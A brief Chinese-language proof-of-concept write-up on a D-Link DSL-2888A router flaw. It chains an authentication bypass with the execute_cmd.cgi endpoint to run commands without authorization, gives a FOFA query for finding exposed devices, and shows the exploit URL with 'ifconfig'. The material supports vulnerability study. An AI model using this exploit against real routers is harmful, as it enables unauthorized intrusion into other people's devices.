漏洞复现-IoT漏洞-D-Link路由

CVE-2020-24581/24579 RCE

简介

D-Link DSL-2888A AU_2.31_V1.1.47ae55之前版本漏洞源于
包含一个execute cmd.cgi特性、该特性允许经过身份验证的用户执行操作系统命令，
在该版本固件中同时存在着一个
不安全认证漏洞（CVE-2020-24580），
在登录界面输入任意密码就可以成功访问路由器界面，
组合这两个漏洞以实现未授权的任意代码执行。

影响范围

AU_2.31_V1.1.47ae55 <=

EG_1.00b4

FOFA

body="DSL-2888A" && server=="uhttpd" && status_code=="200"

访问主页
/page/login/login.html

这里不管什么参数都会识别，参数没有进行限制

 首先输入任意用户名密码，待提示登陆失败后继续进行下一步 
/cgi-bin/execute_cmd.cgi?timestamp=test&cmd=ifconfig